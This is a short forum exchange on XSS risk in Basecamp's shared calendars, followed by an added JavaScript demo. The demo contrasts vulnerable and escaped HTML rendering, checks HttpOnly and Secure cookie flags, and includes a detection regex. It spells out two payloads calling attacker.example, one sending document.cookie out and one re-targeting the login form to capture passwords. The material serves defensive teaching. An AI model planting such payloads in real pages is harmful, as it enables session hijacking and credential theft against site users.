Suppose we're both Basecamp users. It may be possible for me to steal your session by giving you a link to a shared calendar or something with malicious JavaScript. Or I can steal the login cookie of one of the admins by luring them to my website with a support request.
I don't think permitting XSS is a good idea in a shared environment.
Yes. That's why XSS is such a serious security problem. And even if you can't steal cookies, you can still do nasty things like re-target the login form's action to point at your own server and hence steal people's passwords.
http://forum.37signals.com/basecamp/forums/5/topics/3155
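To make the two attacks in the reply above concrete, here is an added example (not code from the thread or from Basecamp): a page that drops a user-supplied shared-calendar name into HTML unescaped, beside the same page with output escaping, plus two constructed payloads of the kind described, one that exfiltrates document.cookie and one that re-targets the login form's action. The host attacker.example, the form id "login", and the cookie header are all assumptions for the demo.

```javascript
// Added example, not from the forum thread or from Basecamp.
// Shows why escaping the attacker-controlled value is the fix, and why
// HttpOnly on the session cookie only blocks the first of the two payloads.

const ESCAPE = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPE[c]);
}

// Login form on the same page (form id "login" is an assumption for the demo).
const LOGIN_FORM =
  '<form id="login" action="/session" method="post">' +
  '<input name="user"><input name="password" type="password">' +
  '<input type="submit"></form>';

// Vulnerable: a calendar name chosen by another user lands in the page as markup.
function renderVulnerable(calendarName) {
  return `<h1>Calendar: ${calendarName}</h1>${LOGIN_FORM}`;
}

// Hardened: the same value is escaped before interpolation.
function renderEscaped(calendarName) {
  return `<h1>Calendar: ${escapeHtml(calendarName)}</h1>${LOGIN_FORM}`;
}

// Constructed payloads; attacker.example is a placeholder host.
// 1) Cookie theft: only works if the session cookie is readable from script
//    (i.e. not flagged HttpOnly).
const COOKIE_THEFT_PAYLOAD =
  '<img src="x" onerror="(new Image).src=\'https://attacker.example/c?\'+encodeURIComponent(document.cookie)">';
// 2) Form re-targeting: works even when the cookie cannot be read, because
//    the victim's own browser posts the typed credentials to the attacker.
const FORM_RETARGET_PAYLOAD =
  '<script>document.getElementById("login").action="https://attacker.example/login";</script>';

// Static check over rendered HTML: a script tag, or an on* handler attribute
// inside a real tag (not inside escaped text).
function containsActiveContent(html) {
  return /<script\b/i.test(html) || /<[a-z]+[^>]*\son[a-z]+=/i.test(html);
}

// Server-side check on a Set-Cookie header (constructed input in the usage
// below). HttpOnly keeps document.cookie from exposing the session id and
// Secure keeps it off plaintext HTTP; neither stops the form re-targeting
// payload, only output escaping does.
function sessionCookieFlags(setCookieHeader) {
  return {
    httpOnly: /;\s*HttpOnly\s*(;|$)/i.test(setCookieHeader),
    secure: /;\s*Secure\s*(;|$)/i.test(setCookieHeader),
  };
}

// Usage: compare the two renderings for each payload.
for (const payload of [COOKIE_THEFT_PAYLOAD, FORM_RETARGET_PAYLOAD]) {
  console.log('vulnerable active content:', containsActiveContent(renderVulnerable(payload)));
  console.log('escaped    active content:', containsActiveContent(renderEscaped(payload)));
}
console.log(sessionCookieFlags('_session_id=abc123; Path=/; HttpOnly; Secure'));
```

The cookie header check is the one that answers "can they steal my cookie"; the rendering comparison is the one that answers "can they still get my password anyway", which is the point of the reply.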